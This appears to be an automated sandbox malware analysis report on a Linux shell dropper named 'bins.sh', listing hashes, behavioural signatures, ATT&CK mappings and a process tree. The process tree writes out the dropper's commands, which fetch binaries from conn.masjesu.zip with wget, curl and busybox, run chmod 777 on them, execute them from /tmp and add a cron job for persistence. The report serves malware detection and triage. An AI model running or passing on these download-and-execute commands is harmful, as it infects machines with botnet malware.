Analysis
- max time kernel: 150s
- max time network: 154s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 04-11-2024 21:22
Static task
- static1
Behavioral tasks
- behavioral1: Sample bins.sh, Resource ubuntu1804-amd64-20240611-en
- behavioral2: Sample bins.sh, Resource debian9-armhf-20240611-en
- behavioral3: Sample bins.sh, Resource debian9-mipsbe-20240729-en
- behavioral4: Sample bins.sh, Resource debian9-mipsel-20240611-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 41b94196f704ad7c3697022b3e4ea893
- SHA1: 4051a27e6c6dd7dccb725ab92e8c7dea796c72e3
- SHA256: ee6db48d4a61adc6012c6afd4d9f710bd063ce9ce5843007de2d905d9ded473b
- SHA512: 46596bb551d352dd6c2c1526b28b6b8f5ed92639fdfedbc4129ea2c1b9c5e669f6b826a6bf4ec8a5c70115cc47a49a59585fe583f5b17ced0d102e5cd6ebdacd
- SSDEEP: 192:zDl9wXPD1sL99yFRf6znqFlZiPpl9v99yFRkznqFlNM:zDl9wXr1sMN6znqFlZixl9oWznqFlNM
Malware Config
Signatures
- Contacts a large (2042) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 4 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Processes: chmod (PID 677), chmod (PID 773), chmod (PID 779), chmod (PID 787)
- Executes dropped EXE (1 IoCs)
  Processes: /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 678)
- Renames itself (1 IoCs)
  Processes: 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 679)
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  Processes: crontab; File opened for modification: /var/spool/cron/crontabs/tmp.hVkzFB
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration (1 TTPs, 1 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  Processes: curl; File opened for reading: /proc/cpuinfo
Processes:
- System Network Configuration Discovery (1 TTPs, 13 IoCs)
  Adversaries may gather information about the network configuration of a system.
  Processes: wget (PID 782), curl (PID 691), busybox (PID 772), curl (PID 777), busybox (PID 778), wget (PID 776), curl (PID 783), busybox (PID 784), wget (PID 790), wget (PID 653), curl (PID 658), busybox (PID 674), wget (PID 690)
- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes: curl; File opened for modification: /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq
Processes
- /tmp/bins.sh: /tmp/bins.sh (PID 647)
  - /bin/rm: /bin/rm bins.sh (PID 651)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 653) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 658) [Checks CPU configuration; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 674) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 677) [File and Directory Permissions Modification]
  - /tmp/3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq: ./3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 678) [Executes dropped EXE; Renames itself; Reads runtime system information]
    - /bin/sh: sh -c "crontab -l" (PID 680)
      - /usr/bin/crontab: crontab -l (PID 681) [Reads runtime system information]
    - /bin/sh: sh -c "crontab -" (PID 683)
      - /usr/bin/crontab: crontab - (PID 684) [Creates/modifies Cron job]
  - /bin/rm: rm 3VGb0gvwOKP3FgPpnbM0qZLe9IQE2UGPhq (PID 686)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF (PID 690) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF (PID 691) [System Network Configuration Discovery]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF (PID 772) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF (PID 773) [File and Directory Permissions Modification]
  - /tmp/q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF: ./q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF (PID 774)
  - /bin/rm: rm q8L7Nf4v4nWCeQdj5uFk6ooIuCHu2YZ0fF (PID 775)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re (PID 776) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re (PID 777) [System Network Configuration Discovery]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re (PID 778) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re (PID 779) [File and Directory Permissions Modification]
  - /tmp/GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re: ./GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re (PID 780)
  - /bin/rm: rm GTzGbuekv82AYjNujuq9hoRr8lG7vB39Re (PID 781)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc (PID 782) [System Network Configuration Discovery]
  - /usr/bin/curl: curl -O http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc (PID 783) [System Network Configuration Discovery]
  - /bin/busybox: /bin/busybox wget http://conn.masjesu.zip/bins/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc (PID 784) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc (PID 787) [File and Directory Permissions Modification]
  - /tmp/E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc: ./E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc (PID 788)
  - /bin/rm: rm E2wNZ7yKREMYc1cnARbkEc0CzhdNuWIlHc (PID 789)
  - /usr/bin/wget: wget http://conn.masjesu.zip/bins/8WFounZGbZXsMF4FelpDqK2Vxd7WpulXMs (PID 790) [System Network Configuration Discovery]
Network
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
    - Linux and Mac File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
    - System Checks (1)
Downloads
- Filesize: 141KB
  MD5: 3ca8decdb1e52c423c521bfff02ac200
  SHA1: 8621ecd6807109b8541912ad9e134f6fb49bfd48
  SHA256: dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
  SHA512: b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
- Filesize: 210B
  MD5: 83501a8b256c5b4ca270b67078e4a7e1
  SHA1: ac6bb053113fd3b10440d025aa3e1f88b3cd8598
  SHA256: 7d83ce19ced840637d8b26a84d8a1864c12547acc6a9ef2f7e0c6d8b3a6d8451
  SHA512: 3ac20b87912469443cbab3cbeeabcf243ade39c848df6bb079a6f545f98b4f08b89b6257e0d48ff19ce04b3a6ccf49af4c07093774c4aa751407c6f640793554